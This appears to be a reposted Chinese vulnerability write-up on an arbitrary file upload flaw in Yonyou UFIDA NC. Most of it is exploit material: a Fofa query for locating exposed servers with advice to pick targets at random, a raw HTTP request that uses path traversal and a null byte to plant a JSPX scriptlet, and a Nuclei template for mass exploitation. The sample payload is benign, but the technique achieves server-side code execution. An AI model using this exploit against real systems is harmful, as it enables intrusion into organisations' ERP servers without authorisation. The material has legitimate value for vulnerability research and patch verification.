用友-UFIDA-NC 任意文件上传漏洞

admin 2024年3月22日14:41:39评论42 views字数 1599阅读5分19秒阅读模式

用友-UFIDA-NC 任意文件上传漏洞

用友-UFIDA-NC 任意文件上传漏洞

漏洞简介

用友-UFIDA-NC 任意文件上传漏洞

用友-UFIDA-NC 存在任意文件上传漏洞.

用友-UFIDA-NC 任意文件上传漏洞

漏洞复现

用友-UFIDA-NC 任意文件上传漏洞

步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

# Fofa搜索语法title="产品登录界面"

步骤二:启代理并打开BP对其首页进行抓包拦截....修改请求头内..

POST /uapws/saveDoc.ajax?ws=/../../test1.jspx%00 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Content-Type: application/x-www-form-urlencodedcontent=<hi xmlns:hi="http://java.sun.com/JSP/Page">      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>   <hi:scriptlet>            out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();    </hi:scriptlet></hi>

用友-UFIDA-NC 任意文件上传漏洞

访问上传文件

http://127.0.0.1/uapws/test1.jspx

用友-UFIDA-NC 任意文件上传漏洞

用友-UFIDA-NC 任意文件上传漏洞

批量脚本

用友-UFIDA-NC 任意文件上传漏洞
id: yonyou-UFIDA-NC-saveDoc-ajax-uploadfileinfo:  name: 用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!  author: ly  severity: high  metadata:     fofa-query: title="产品登录界面"variables:  filename: "{{to_lower(rand_base(5))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /uapws/saveDoc.ajax?ws=/../../{{filename}}.jspx%00 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Content-Type: application/x-www-form-urlencoded        content=<hi xmlns:hi="http://java.sun.com/JSP/Page">              <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>          <hi:scriptlet>                    out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();           </hi:scriptlet>        </hi>      - |        GET /uapws/{{filename}}.jspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")

        

原文始发于微信公众号(揽月安全团队):用友-UFIDA-NC 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月22日14:41:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友-UFIDA-NC 任意文件上传漏洞http://cn-sec.com/archives/2594614.html

发表评论

匿名网友 填写信息